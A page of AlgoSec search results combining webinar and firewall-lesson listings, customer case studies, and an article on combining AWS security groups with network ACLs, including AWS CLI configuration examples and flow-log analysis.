
Search results


  • Journey to the Cloud | AlgoSec

    Webinars: Journey to the Cloud. Learn to speed up application delivery across a hybrid cloud environment while maintaining a high level of security. Efficient cloud management helps simplify today's complex network environment, allowing you to secure application connectivity anywhere. But it can be hard to achieve sufficient visibility when your data is dispersed across numerous public clouds, private clouds, and on-premises devices. Today it is easier than ever to speed up application delivery across a hybrid cloud environment while maintaining a high level of security. In this webinar, we'll discuss:
    – The basics of managing multiple workloads in the cloud
    – How to create a successful enterprise-level security management program
    – The structure of effective hybrid cloud management
    July 5, 2022. Speakers: Stephen Owen, Esure Group; Omer Ganot, Product Manager.
    Relevant resources: Cloud atlas: how to accelerate application migrations to the cloud | A Pragmatic Approach to Network Security Across Your Hybrid Cloud Environment | 6 best practices to stay secure in the hybrid cloud

  • Algosec Cloud Enterprise (ACE) - AlgoSec

    Algosec Cloud Enterprise (ACE) case study. Download PDF.

  • Firewall Management 201 | algosec

    Security Policy Management with Professor Wool: Firewall Management 201. Firewall Management with Professor Wool is a whiteboard-style series of lessons that examine the challenges of, and provide technical tips for, managing security policies in evolving enterprise networks and data centers.
    Lesson 1: In this lesson, Professor Wool discusses his research on different firewall misconfigurations and provides tips for preventing the most common risks. Examining the Most Common Firewall Misconfigurations | Watch
    Lesson 2: In this lesson, Professor Wool examines the challenges of managing firewall change requests and provides tips on how to automate the entire workflow. Automating the Firewall Change Control Process | Watch
    Lesson 3: In this lesson, Professor Wool offers some recommendations for simplifying firewall management overhead by defining and enforcing object naming conventions. Using Object Naming Conventions to Reduce Firewall Management Overhead | Watch
    Lesson 4: In this lesson, Professor Wool examines some tips for including firewall rule recertification as part of your change management process, including questions you should be asking and be able to answer, as well as guidance on how to effectively recertify firewall rules. Tips for Firewall Rule Recertification | Watch
    Lesson 5: In this lesson, Professor Wool examines how virtualization, outsourcing of data centers, worker mobility and the consumerization of IT have all played a role in dissolving the network perimeter, and what you can do to regain control. Managing Firewall Policies in a Disappearing Network Perimeter | Watch
    Lesson 6: In this lesson, Professor Wool examines some of the challenges when it comes to managing routers and access control lists (ACLs) and provides recommendations for including routers as part of your overall security policy, with tips on change management, auditing and ACL optimization. Analyzing Routers as Part of Your Security Policy | Watch
    Lesson 7: In this lesson, Professor Wool examines the complex challenges of accurately simulating network routing, specifically drilling into three options for extracting the routing information from your network: SNMP, SSH and HSRP or VRRP. Examining the Challenges of Accurately Simulating Network Routing | Watch
    Lesson 8: In this lesson, Professor Wool examines the complex challenges of accurately simulating network routing, specifically drilling into three options for extracting the routing information from your network: SNMP, SSH and HSRP or VRRP. NAT Considerations When Managing Your Security Policy | Watch
    Lesson 9: In this lesson, Professor Wool explains how you can create templates, using network objects, for different types of services and network access which are reused by many different servers in your data center. Using this technique will save you from writing new firewall rules each time you provision or change a server, reduce errors, and allow you to provision and expand your server estate more quickly. How to Structure Network Objects to Plan for Future Policy Growth | Watch
    Lesson 10: In this lesson, Professor Wool examines the challenges of migrating business applications and physical data centers to a private cloud and offers tips to conduct these migrations without the risk of outages. Tips to Simplify Migrations to a Virtual Data Center | Watch
    Lesson 11: In this lesson, Professor Wool provides the example of a virtualized private cloud which uses hypervisor technology to connect to the outside world via a firewall. If all workloads within the private cloud share the same security requirements, this setup is adequate. But what happens if you want to run workloads with different security requirements within the cloud? Professor Wool explains the different options for filtering traffic within a private cloud, and discusses the challenges and solutions for managing them. Tips for Filtering Traffic within a Private Cloud | Watch
    Lesson 12: In this lesson, Professor Wool discusses ways to ensure that the security policies on your primary site and on your disaster recovery (DR) site are always in sync. He presents multiple scenarios: where the DR and primary site use the exact same firewalls, where different vendor solutions or different models are used on the DR site, and where the IP address is or is not the same on the two sites. Managing Your Security Policy for Disaster Recovery | Watch
    Lesson 13: In this lesson, Professor Wool highlights the challenges, benefits and trade-offs of utilizing zero-touch automation for security policy change management. He explains how, using conditional logic, it's possible to significantly speed up security policy change management while maintaining control and ensuring accuracy throughout the process. Zero-Touch Change Management with Checks and Balances | Watch
    Lesson 14: Many organizations have different types of firewalls from multiple vendors, which typically means there is no single source for naming and managing network objects. This ends up creating duplication, confusion, mistakes and network connectivity problems, especially when a new change request is generated and you need to know which network object to refer to. In this lesson, Professor Wool provides tips and best practices for how to synchronize network objects in a multi-vendor environment, for both legacy scenarios and greenfield scenarios. Synchronized Object Management in a Multi-Vendor Environment | Watch
    Lesson 15: Many organizations have both a firewall management system and a CMDB, yet these systems do not communicate with each other and their data is not synchronized. This becomes a problem when making security policy change requests: someone typically needs to manually translate the names used in the firewall management system to the names in the CMDB in order for the change request to work, which is a slow and error-prone process. In this lesson, Professor Wool provides tips on how to use a network security policy management solution to coordinate between the two systems, match the object names, and then automatically populate the change management process with the correct names and definitions. How to Synchronize Object Management with a CMDB | Watch
    Lesson 16: Some companies use tools to automatically convert firewall rules from an old firewall, due to be retired, to a new firewall. In this lesson, Professor Wool explains why this process can be risky and provides some specific technical examples. He then presents a more realistic way to manage the firewall rule migration process that involves stages and checks and balances to ensure a smooth, secure transition to the new firewall that maintains secure connectivity. How to Take Control of a Firewall Migration Project | Watch
    Lesson 17: PCI-DSS 3.2 regulation requirement 6.1 mandates that organizations establish a process for identifying security vulnerabilities on the servers that are within the scope of PCI. In this lesson, Professor Wool explains how to address this requirement by presenting vulnerability data both by server and by the business processes that rely on each server. He discusses why this method is important and how it allows companies to achieve compliance while ensuring ongoing business operations. PCI – Linking Vulnerabilities to Business Applications | Watch
    Lesson 18: Collaboration tools such as Slack provide a convenient way to have group discussions and complete collaborative business tasks. Now, automated chatbots can be used for answering questions and handling tasks for development, IT and infosecurity teams. For example, enterprises can use chatbots to automate information-sharing across silos, such as between IT and application owners. So rather than having to call somebody and ask them "Is that system up? What happened to my security change request?" and so on, tracking helpdesk issues and the status of help requests can become much more accessible and responsive. Chatbots also make access to siloed resources more democratic and more widely available across the organization (subject, of course, to the necessary access rights). In this video, Prof. Wool discusses how automated chatbots can be used to help a wide range of users with their security policy management tasks, thereby improving service to stakeholders and helping to accelerate security policy change processes across the enterprise. Sharing Network Security Information with the Wider IT Community With Team Collaboration Tools | Watch
    Have a Question for Professor Wool? Ask him now.

  • Palo Alto and AlgoSec Joint Solution Brief - AlgoSec

    Palo Alto and AlgoSec Joint Solution Brief. Download PDF.

  • Life Insurance | AlgoSec

    Explore AlgoSec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions.
    Leading Life Insurance Company Ensures Security and Compliance
    Organization: Life Insurance | Industry: Financial Services | Headquarters: Texas, USA | Download case study
    Customer success stories
    "AlgoSec worked right out of the box. We got started quickly and never looked back." A leading insurance provider of life, disability and other benefits for individuals increases efficiency and ensures continuous compliance on their networks.
    Background: This life insurance company provides insurance and wealth-management products and services to millions of Americans. The company employs thousands of people and maintains a network of several thousand financial representatives. They offer a wide range of insurance products and services that include life insurance, disability income insurance, annuities, investments, dental and vision.
    Challenges: For decades, the company operated a large and growing data center in Bethlehem, PA, which they recently transferred to Dallas, TX. During and since the transfer, the company has been replacing much of its multi-vendor network infrastructure, consolidating on Cisco Firepower technology while still maintaining vestiges of other routers, firewalls and network equipment. At the new data center, the company's IT staff maintains more than 100 firewalls that host some 10,000 rules. The company's network security engineer described the considerable pressure on the security staff: "Change requests are frequent, 25-30 per week, demanding considerable time and effort by the security team." Due to the presence of firewalls from multiple vendors, change requests were analyzed manually and pushed to devices with great care so as not to interrupt the operation of a rapidly growing body of applications. "The change-request process was tedious and very time consuming," declared the engineer, "as was the pressure to maintain a strong compliance posture at all times." The company is subject to a litany of demanding insurance-industry regulations that concern the care of personal information and processes. Managing risk is critical to the success of the business, and being able to ascertain compliance with regulations is always vital.
    Solution: The security team turned to AlgoSec to help them manage network security policy across the large data center that includes firewalls from multiple vendors. After a careful review, the security team acquired AlgoSec's Firewall Analyzer to speed up the process of firewall change management as well as to continuously quantify the degree of compliance and level of risk. Vendor-agnostic AlgoSec Firewall Analyzer delivers visibility and analysis of complex network security policies across on-premises and cloud networks. It automates and simplifies security operations, including troubleshooting, auditing and risk analysis. Firewall Analyzer optimizes the configuration of firewalls, routers, web proxies and related network infrastructure to ensure security and compliance.
    Results: After a very short installation and learning period, the security staff became proficient at operating Firewall Analyzer's helpful capabilities. Soon thereafter, staff members undertook AlgoSec certification courses to become experts in using the solution for firewall analysis. "AlgoSec worked right out of the box," said the engineer. "We got started quickly and never looked back." The AlgoSec solution has significantly improved processes and results for their security team:
    – Reduced time to analyze and optimize firewall rules, automatically checking for shadow rules and discovering other rules eligible for consolidation or deletion.
    – Continual optimization of firewall rules across their entire network estate.
    – Increased efficiency of security staff, enabling them to keep up with the volume of change requests.
    – Accelerated and more accurate change verification.
    – Audit-readiness, generating scheduled and on-demand compliance reports.
    The security staff looks forward to implementing AlgoSec FireFlow (AFF), which will enable them to push changes automatically to their population of firewalls, eliminating errors and further reducing risk. With AFF, the staff will be able to respond to changing business requirements with increased speed and agility. They added: "We are also checking out AlgoSec's new cloud-security solution since we are migrating a growing number of applications to AWS."

  • Energy Supplier | AlgoSec

    Explore AlgoSec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions.
    Energy supplier keeps the lights on with automated network change management
    Organization: Energy Supplier | Industry: Utilities & Energy | Headquarters: International | Download case study
    Customer success stories
    "AlgoSec has saved us a lot of time in managing our rule base." Large energy supplier empowers internal stakeholders and streamlines network security policy change process.
    Background: The company is the provider of electricity and gas for their country. They are responsible for the planning, construction, operation, maintenance and global technical management of both these grids and associated infrastructures.
    The Challenge: In order to provide power to millions of people, the company runs more than twenty IT and OT firewalls from multiple vendors that are hosted in multiple data centers throughout the country. Some of the challenges included:
    – Lack of visibility over a complex architecture. With multiple networks, IT managers needed to know which network is behind which firewall and connect traffic flows to firewall rules. Change management processes were being handled with network diagrams created in Microsoft Visio and Microsoft Excel spreadsheets, tools that were not designed for network security policy management.
    – Thousands of rules. Each firewall may have thousands of rules, many of which are unneeded and introduce unnecessary risk. Managing the maze of rules was time consuming and took time away from other strategic initiatives.
    – Unnecessary requests. Business stakeholders were requesting status information about network traffic and making duplicate and unnecessary change requests for items covered by existing rules.
    The Solution: The company was searching for a solution that provided:
    – Visibility into their network topology, including traffic flows.
    – Optimization of their firewall rules.
    – Alerts before time-based rules expire.
    – Automatic implementation of their rule base onto their firewall devices.
    They implemented AlgoSec Firewall Analyzer and AlgoSec FireFlow, as well as AlgoBot, AlgoSec's ChatOps solution. AlgoSec Firewall Analyzer ensures security and compliance by providing visibility and analysis into complex network security policies. AlgoSec FireFlow improves security and saves security staff's time by automating the entire security policy change process, eliminating manual errors, and reducing risk. AlgoBot is an intelligent chatbot that handles network security policy management tasks. AlgoBot answers business users' questions, submitted in plain English, and automatically assists with security policy change management processes, without requiring manual inputs or additional research.
    The Results: Some of the ways the company benefited from using AlgoSec include:
    – Visibility and topology mapping. They are able to get a picture of their entire network and view traffic flows to each network device.
    – Optimized firewall rules. They are able to adjust the placement of their rules, placing their most-used rules higher in the rule base to improve performance, and to check for unused objects and rules to clean up; removing unused rules further improves firewall performance.
    – Improved communication and transparency for time-based rules. Before time-based rules (rules with an expiration date) expire, the requester is automatically notified and asked whether the rule should be extended or removed.
    – Better, more refined rule requests. By first gathering information from AlgoBot, rule requests are better focused. Internal customers are able to check if rules are already in place before making requests, therefore avoiding requests that are already covered by existing rules.
    – Empowered internal stakeholders. The IT team saves time by letting internal stakeholders use AlgoBot to get answers to traffic queries themselves.
    – Met change implementation SLAs. By implementing their rules with AlgoSec, the company meets their internal SLAs for change implementation.
    – Streamlined auditing processes. By documenting the changes they made in the firewalls, who made them, and when, their audit processes are streamlined.
    – Zero-touch automation. Automatically implementing rules in multiple firewalls simultaneously ensures policy consistency across multiple devices while preserving staff resources. This also eliminates the need to use the management consoles from individual vendors, saving time and reducing misconfigurations.
    – Staff efficiencies. Hundreds of monthly change requests are managed by a single staff member, which would not be possible without AlgoSec.
    The company switched to AlgoSec because it was more user-friendly and provided greater visibility than the competing solution they were previously using. They are also impressed with AlgoSec's scalability. "The initial setup is really easy. It has been running flawlessly since installation. Even upgrades are pretty straightforward and have never given us problems," they noted.

  • Energy Group | AlgoSec

    Explore AlgoSec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions.
    Global Energy Group Streamlines Change Requests Process
    Organization: Energy Group | Industry: Utilities & Energy | Headquarters: International | Download case study
    Customer success stories
    "Now we can do a firewall change in around one hour. Before, it took five days or more with 20 engineers. Today, we do the same job, but much quicker, with 4 people - resulting in happier customers," says the Security Service Delivery Manager. "One of the best things you win in the end is the cost. With 500 changes on a firewall a month, that's significant."
    IT Integrator Gets Faster Implementation of Firewall Changes – Leading to Greater Efficiency and Lower Costs
    BACKGROUND: The company is the IT integrator for a large energy group, which offers low-carbon energy and services. The group's purpose is to act to accelerate the transition towards a carbon-neutral world, through reduced energy consumption and more environmentally friendly solutions, reconciling economic performance with a positive impact on people and the planet. The IT integrator of the group designs, implements and operates IT solutions for all its business units and provides applications and infrastructure services. It includes four "families" of services: Digital and IT Consulting, Digital Workplace, Cloud Infrastructures, and Network and Cybersecurity, and Agile business solutions.
    CHALLENGES: This large group (with 170,000 employees) had a complex network with multiple elements in the firewall. With 240 firewall change requests and 500 changes a month, they needed an easier and faster way to manage these changes, ensuring their business applications functioned properly while maintaining their security posture. The main challenges were:
    – A large network with lots of rules.
    – Slow execution of change requests.
    – Change requests that were very labor intensive.
    SOLUTION: With 500 monthly firewall changes, the customer was searching for a solution that provided:
    – Faster implementation of firewall changes.
    – A clear workflow and easier change management processes.
    – Comprehensive firewall support.
    – Visibility into their business applications and traffic flows.
    The client chose AlgoSec for its workflow solution, requiring a tool that would help the customer seamlessly submit requests and enable the engineer to implement the optimal changes to the firewall. They implemented the AlgoSec Security Policy Management Solution, made up of AlgoSec Firewall Analyzer, AlgoSec FireFlow, and AlgoSec AppViz and AppChange (formerly AlgoSec BusinessFlow). AlgoSec Firewall Analyzer ensures security and compliance by providing visibility and analysis into complex network security policies. AlgoSec FireFlow improves security and saves security staff's time by automating the entire security policy change process, eliminating manual errors, and reducing risk. AlgoSec AppViz provides critical security information regarding the firewalls and firewall rules supporting each connectivity flow by letting users discover, identify, and map business applications. AlgoSec AppChange empowers customers to make changes at the business application level, including application migrations, server deployment, and decommissioning projects.
    RESULTS: "We do the job quicker, with less people. With 500 changes on a firewall a month, that's significant. I recommend AlgoSec as it gives a quick solution for the request and analysis," said the Security Service Delivery Manager. By using the AlgoSec Security Management Solution, the customer gained:
    – Greater insight and oversight into their firewalls and other network devices.
    – Identification of risky rules and other holes in their network security policy.
    – An easier cleanup process due to greater visibility.
    – An 80% reduction in manpower.
    – Faster implementation of policy changes: from five days to one hour.

  • AlgoSec | NACL best practices: How to combine security groups with network ACLs effectively

    AWS NACL best practices: How to combine security groups with network ACLs effectively. Prof. Avishai Wool | 2 min read | Published 8/28/23
    Like all modern cloud providers, Amazon adopts the shared responsibility model for cloud security. Amazon guarantees secure infrastructure for Amazon Web Services, while AWS users are responsible for maintaining secure configurations. That requires using multiple AWS services and tools to manage traffic. You'll need to develop a set of inbound rules for incoming connections between your Amazon Virtual Private Cloud (VPC) and all of its Elastic Compute (EC2) instances and the rest of the Internet. You'll also need to manage outbound traffic with a series of outbound rules. Your Amazon VPC provides you with several tools to do this. The two most important ones are security groups and Network Access Control Lists (NACLs). Security groups are stateful firewalls that secure inbound traffic for individual EC2 instances. Network ACLs are stateless firewalls that secure inbound and outbound traffic for VPC subnets. Managing AWS VPC security requires configuring both of these tools appropriately for your unique security risk profile. This means planning your security architecture carefully to align it with the rest of your security framework. For example, your firewall rules impact the way AWS Identity and Access Management (IAM) handles user permissions. Some (but not all) IAM features can be implemented at the network firewall layer of security. Before you can manage AWS network security effectively, you must familiarize yourself with how AWS security tools work and what sets them apart.
    Everything you need to know about security groups vs NACLs
    AWS security groups explained: Every AWS account has a single default security group assigned to the default VPC in every Region. It is configured to allow inbound traffic from network interfaces assigned to the same group, using any protocol and any port. It also allows all outbound traffic using any protocol and any port. Your default security group will also allow all outbound IPv6 traffic once your VPC is associated with an IPv6 CIDR block. You can't delete the default security group, but you can create new security groups and assign them to AWS EC2 instances. Each security group can only contain up to 60 rules, but you can set up to 2,500 security groups per Region. You can associate many different security groups with a single instance, potentially combining hundreds of rules. These are all allow rules that permit traffic to flow according to the ports and protocols specified. For example, you might set up a rule that authorizes inbound traffic over IPv6 for Linux SSH commands and sends it to a specific destination. This could be different from the destination you set for other TCP traffic. Security groups are stateful, which means that requests sent from your instance will be allowed to flow regardless of inbound traffic rules. Similarly, VPC security groups automatically allow responses to inbound traffic to flow out regardless of outbound rules. However, since security groups do not support deny rules, you can't use them to block a specific IP address from connecting with your EC2 instance.
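    To make the allow-only, stateful behavior concrete, here is a minimal AWS CLI sketch; the group name, IDs, and CIDR blocks are placeholders for illustration, not values taken from this article:
    # Create a security group for a web tier in an existing VPC
    aws ec2 create-security-group --group-name web-tier-sg \
        --description "Web tier security group" --vpc-id vpc-0abc1234def567890
    # Allow HTTPS from anywhere and SSH only from an admin range.
    # There is no "deny" variant of this call: security groups hold only allow rules,
    # and return traffic for these connections is permitted automatically (stateful).
    aws ec2 authorize-security-group-ingress --group-id sg-0123456789abcdef0 \
        --protocol tcp --port 443 --cidr 0.0.0.0/0
    aws ec2 authorize-security-group-ingress --group-id sg-0123456789abcdef0 \
        --protocol tcp --port 22 --cidr 203.0.113.0/24
    When you do need to block traffic outright, that job falls to NACLs, as described below.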
    Be aware that Amazon EC2 automatically blocks email traffic on port 25 by default – but this is not included as a specific rule in your default security group.
    AWS NACLs explained: Your VPC comes with a default NACL configured to automatically allow all inbound and outbound network traffic. Unlike security groups, NACLs filter traffic at the subnet level. That means that Network ACL rules apply to every EC2 instance in the subnet, allowing users to manage AWS resources more efficiently. Every subnet in your VPC must be associated with a Network ACL. Any single Network ACL can be associated with multiple subnets, but each subnet can only be assigned to one Network ACL at a time. Every rule has its own rule number, and Amazon evaluates rules in ascending order. The most important characteristic of NACL rules is that they can deny traffic. Amazon evaluates these rules when traffic enters or leaves the subnet – not while it moves within the subnet. You can access more granular data on data flows using VPC flow logs. Since Amazon evaluates NACL rules in ascending order, make sure that you place deny rules earlier in the table than rules that allow traffic to multiple ports. You will also have to create specific rules for IPv4 and IPv6 traffic – AWS treats these as two distinct types of traffic, so rules that apply to one do not automatically apply to the other.
    Once you start customizing NACLs, you will have to take into account the way they interact with other AWS services. For example, Elastic Load Balancing won't work if your NACL contains a deny rule excluding traffic from 0.0.0.0/0 or the subnet's CIDR. You should create specific inclusions for services like Elastic Load Balancing, AWS Lambda, and AWS CloudWatch. You may need to set up specific inclusions for third-party APIs as well. You can create these inclusions by specifying ephemeral port ranges that correspond to the services you want to allow. For example, NAT gateways use ports 1024 to 65535. This is the same range covered by AWS Lambda functions, but it's different from the range used by Windows operating systems. When creating these rules, remember that unlike security groups, NACLs are stateless. That means that when responses to allowed traffic are generated, those responses are subject to NACL rules. Misconfigured NACLs deny traffic responses that should be allowed, leading to errors, reduced visibility, and potential security vulnerabilities.
    How to configure and map NACL associations
    A major part of optimizing NACL architecture involves mapping the associations between security groups and NACLs. Ideally, you want to enforce a specific set of rules at the subnet level using NACLs, and a different set of instance-specific rules at the security group level. Keeping these rulesets separate will prevent you from setting inconsistent rules and accidentally causing unpredictable performance problems. The first step in mapping NACL associations is using the Amazon VPC console to find out which NACL is associated with a particular subnet. Since NACLs can be associated with multiple subnets, you will want to create a comprehensive list of every association and the rules they contain.
    To find out which NACL is associated with a subnet: Open the Amazon VPC console. Select Subnets in the navigation pane. Select the subnet you want to inspect. The Network ACL tab will display the ID of the ACL associated with that network, and the rules it contains.
    To find out which subnets are associated with a NACL: Open the Amazon VPC console.
    Select Network ACLs in the navigation pane. Click over to the column entitled Associated With. Select a Network ACL from the list. Look for Subnet associations on the details pane and click on it. The pane will show you all subnets associated with the selected Network ACL.
    Now that you know the difference between security groups and NACLs and can map the associations between your subnets and NACLs, you're ready to implement some security best practices that will help you strengthen and simplify your network architecture.
    5 best practices for AWS NACL management
    Pay close attention to default NACLs, especially at the beginning
    Since every VPC comes with a default NACL, many AWS users jump straight into configuring their VPC and creating subnets, leaving NACL configuration for later. The problem here is that every subnet associated with your VPC will inherit the default NACL. This allows all traffic to flow into and out of the network. Going back and building a working security policy framework will be difficult and complicated – especially if adjustments are still being made to your subnet-level architecture. Taking time to create custom NACLs and assign them to the appropriate subnets as you go will make it much easier to keep track of changes to your security posture as you modify your VPC moving forward.
    Implement a two-tiered system where NACLs and security groups complement one another
    Security groups and NACLs are designed to complement one another, yet not every AWS VPC user configures their security policies accordingly. Mapping out your assets can help you identify exactly what kind of rules need to be put in place, and may help you determine which tool is the best one for each particular case. For example, imagine you have a two-tiered web application with web servers in one security group and a database in another. You could establish inbound NACL rules that allow external connections to your web servers from anywhere in the world (enabling port 443 connections) while strictly limiting access to your database (by only allowing port 3306 connections for MySQL).
    Look out for ineffective, redundant, and misconfigured deny rules
    Amazon recommends placing deny rules first in the sequential list of rules that your NACL enforces. Since you're likely to enforce multiple deny rules per NACL (and multiple NACLs throughout your VPC), you'll want to pay close attention to the order of those rules, looking for conflicts and misconfigurations that will impact your security posture. Similarly, you should pay close attention to the way security group rules interact with your NACLs. Even misconfigurations that are harmless from a security perspective may end up impacting the performance of your instance, or causing other problems. Regularly reviewing your rules is a good way to prevent these mistakes from occurring.
    Limit outbound traffic to the required ports or port ranges
    When creating a new NACL, you have the ability to apply inbound or outbound restrictions. There may be cases where you want to set outbound rules that allow traffic from all ports. Be careful, though: this may introduce vulnerabilities into your security posture. It's better to limit access to the required ports, or to specify the corresponding port range for outbound rules. This applies the principle of least privilege to outbound traffic and limits the risk of unauthorized access that may occur at the subnet level.
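    To make the two-tier example and the outbound-port guidance above concrete, here is a hedged AWS CLI sketch; the NACL IDs, subnet ID, and CIDR blocks are illustrative placeholders, not values from this article:
    # CLI equivalent of the console steps above: which NACL covers a given subnet?
    aws ec2 describe-network-acls --filters Name=association.subnet-id,Values=subnet-0123456789abcdef0
    # Web-tier subnet NACL: allow HTTPS in from anywhere
    aws ec2 create-network-acl-entry --network-acl-id acl-0aaa1111aaa1111aa --ingress \
        --rule-number 100 --protocol tcp --port-range From=443,To=443 \
        --cidr-block 0.0.0.0/0 --rule-action allow
    # Database-tier subnet NACL: allow MySQL only from the web subnet's CIDR
    aws ec2 create-network-acl-entry --network-acl-id acl-0bbb2222bbb2222bb --ingress \
        --rule-number 100 --protocol tcp --port-range From=3306,To=3306 \
        --cidr-block 10.0.1.0/24 --rule-action allow
    # Database-tier subnet NACL: limit outbound replies to ephemeral ports rather than all ports
    aws ec2 create-network-acl-entry --network-acl-id acl-0bbb2222bbb2222bb --egress \
        --rule-number 100 --protocol tcp --port-range From=1024,To=65535 \
        --cidr-block 10.0.1.0/24 --rule-action allow
    Because NACLs are stateless, that egress entry for the ephemeral port range is what allows reply traffic to leave the subnet at all.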
    Test your security posture frequently and verify the results
    How do you know if your particular combination of security groups and NACLs is optimal? Testing your architecture is a vital step towards making sure you haven't left out any glaring vulnerabilities. It also gives you a good opportunity to address misconfiguration risks. This doesn't always mean actively running penetration tests with experienced red team consultants, although that's a valuable way to ensure best-in-class security. It also means taking time to validate your rules by running small tests with an external device. Consider using AWS flow logs to trace the way your rules direct traffic and using that data to improve your work.
    How to diagnose security group rules and NACL rules with flow logs
    Flow logs allow you to verify whether your firewall rules follow security best practices effectively. You can follow data ingress and egress and observe how data interacts with your AWS security rule architecture at each step along the way. This gives you clear visibility into how efficient your route tables are, and may help you configure your internet gateways for optimal performance. Before you can use the flow log CLI, you will need to create an IAM role that includes a policy granting users the permission to create, configure, and delete flow logs. Flow logs are available at three distinct levels, each accessible through its own console: network interfaces, VPCs, and subnets.
    You can use the ping command from an external device to test the way your instance's security group and NACLs interact. Your security group rules (which are stateful) will allow the response ping from your instance to go through. Your NACL rules (which are stateless) will not allow the outbound ping response to travel back to your device. You can look for this activity through a flow log query. Here is a quick tutorial on how to create a flow log query to check your AWS security policies.
    First you'll need to create a flow log in the AWS CLI. This example captures all traffic (both accepted and rejected) for a specified network interface and delivers the flow logs to a CloudWatch log group, with permissions specified in the IAM role:
    aws ec2 create-flow-logs \
        --resource-type NetworkInterface \
        --resource-ids eni-1235b8ca123456789 \
        --traffic-type ALL \
        --log-group-name my-flow-logs \
        --deliver-logs-permission-arn arn:aws:iam::123456789101:role/publishFlowLogs
    Assuming your test pings represent the only traffic flowing between your external device and EC2 instance, you'll get two records that look like this:
    2 123456789010 eni-1235b8ca123456789 203.0.113.12 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK
    2 123456789010 eni-1235b8ca123456789 172.31.16.139 203.0.113.12 0 0 1 4 336 1432917094 1432917142 REJECT OK
    To parse this data, you'll need to familiarize yourself with flow log syntax. Default flow log records contain 14 fields, although you can also expand custom queries to return more than double that number:
    – Version tells you the version currently in use. Default flow log requests use Version 2. Expanded custom requests may use Version 3 or 4.
    – Account-id tells you the account ID of the owner of the network interface that traffic is traveling through. The record may display as unknown if the network interface is part of an AWS service like a Network Load Balancer.
    – Interface-id shows the unique ID of the network interface for the traffic currently under inspection.
    – Srcaddr shows the source of incoming traffic, or the address of the network interface for outgoing traffic. In the case of IPv4 addresses for network interfaces, it is always its private IPv4 address.
    – Dstaddr shows the destination of outgoing traffic, or the address of the network interface for incoming traffic. In the case of IPv4 addresses for network interfaces, it is always its private IPv4 address.
    – Srcport is the source port for the traffic under inspection.
    – Dstport is the destination port for the traffic under inspection.
    – Protocol refers to the corresponding IANA traffic protocol number.
    – Packets describes the number of packets transferred.
    – Bytes describes the number of bytes transferred.
    – Start shows the start time when the first data packet was received. This could be up to one minute after the network interface transmitted or received the packet.
    – End shows the time when the last data packet was received. This can be up to one minute after the network interface transmitted or received the data packet.
    – Action describes what happened to the traffic under inspection: ACCEPT means that traffic was allowed to pass. REJECT means the traffic was blocked, typically by security groups or NACLs.
    – Log-status confirms the status of the flow log: OK means data is logging normally. NODATA means no network traffic to or from the network interface was detected during the specified interval. SKIPDATA means some flow log records are missing, usually due to internal capacity constraints or other errors.
    Going back to the example above, the flow log output shows that a user sent a command from a device with the IP address 203.0.113.12 to the network interface's private IP address, which is 172.31.16.139. The security group's inbound rules allowed the ICMP traffic to travel through, producing an ACCEPT record. However, the NACL did not let the ping response go through, because it is stateless. This generated the REJECT record that followed immediately after. If you configure your NACL to permit outbound ICMP traffic and run this test again, the second flow log record will change to ACCEPT.
    Amazon Web Services (AWS) is one of the most popular options for organizations looking to migrate their business applications to the cloud. It's easy to see why: AWS offers high capacity, scalable and cost-effective storage, and a flexible, shared responsibility approach to security. Essentially, AWS secures the infrastructure, and you secure whatever you run on that infrastructure. However, this model does throw up some challenges. What exactly do you have control over? How can you customize your AWS infrastructure so that it isn't just secure today, but will continue delivering robust, easily managed security in the future?
    The basics: security groups
    AWS offers virtual firewalls to organizations, for filtering traffic that crosses their cloud network segments. The AWS firewalls are managed using a concept called Security Groups. These are the policies, or lists of security rules, applied to an instance – a virtualized computer in the AWS estate. AWS Security Groups are not identical to traditional firewalls, and they have some unique characteristics and functionality that you should be aware of; we've discussed them in detail in video lesson 1: the fundamentals of AWS Security Groups, but the crucial points to be aware of are as follows. First, security groups do not deny traffic – that is, all the rules in security groups are positive, and allow traffic.
    Second, while security group rules can be set to specify a traffic source, or a destination, they cannot specify both on the same rule. This is because AWS always sets the unspecified side (source or destination) as the instance to which the group is applied. Finally, single security groups can be applied to multiple instances, or multiple security groups can be applied to a single instance: AWS is very flexible. This flexibility is one of the unique benefits of AWS, allowing organizations to build bespoke security policies across different functions and even operating systems, mixing and matching them to suit their needs.
    Adding Network ACLs into the mix
    To further enhance and enrich its security filtering capabilities, AWS also offers a feature called Network Access Control Lists (NACLs). Like security groups, each NACL is a list of rules, but there are two important differences between NACLs and security groups. The first difference is that NACLs are not directly tied to instances, but are tied to the subnet within your AWS virtual private cloud that contains the relevant instance. This means that the rules in a NACL apply to all of the instances within the subnet, in addition to all the rules from the security groups. So a specific instance inherits all the rules from the security groups associated with it, plus the rules associated with a NACL which is optionally associated with a subnet containing that instance. As a result, NACLs have a broader reach, and affect more instances than a security group does. The second difference is that NACLs can be written to include an explicit action, so you can write 'deny' rules – for example, to block traffic from a particular set of IP addresses which are known to be compromised. The ability to write 'deny' actions is a crucial part of NACL functionality.
    It's all about the order
    As a consequence, when you have the ability to write both 'allow' rules and 'deny' rules, the order of the rules now becomes important. If you switch the order of the rules between a 'deny' and 'allow' rule, then you're potentially changing your filtering policy quite dramatically. To manage this, AWS uses the concept of a 'rule number' within each NACL. By specifying the rule number, you can identify the correct order of the rules for your needs. You can choose which traffic you deny at the outset, and which you then actively allow. As such, with NACLs you can manage security tasks in a way that you cannot do with security groups alone. However, we did point out earlier that an instance inherits security rules from both the security groups and the NACLs – so how do these interact? The order in which rules are evaluated is this: for inbound traffic, AWS's infrastructure first assesses the NACL rules. If traffic gets through the NACL, then all the security groups that are associated with that specific instance are evaluated, and the order in which this happens within and among the security groups is unimportant because they are all 'allow' rules. For outbound traffic, this order is reversed: the traffic is first evaluated against the security groups, and then finally against the NACL that is associated with the relevant subnet. You can see me explain this topic in person in my new whiteboard video.
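    To illustrate how rule numbers drive this ordering, here is a small AWS CLI sketch; the NACL ID and CIDR blocks are placeholders rather than values from the article:
    # Rule 90: explicitly deny a known-compromised range; evaluated before rule 100
    aws ec2 create-network-acl-entry --network-acl-id acl-0123456789abcdef0 --ingress \
        --rule-number 90 --protocol tcp --port-range From=0,To=65535 \
        --cidr-block 198.51.100.0/24 --rule-action deny
    # Rule 100: allow HTTPS from anywhere. NACL rules are evaluated in ascending order and
    # the first match wins, so swapping these two rule numbers would let the blocked range
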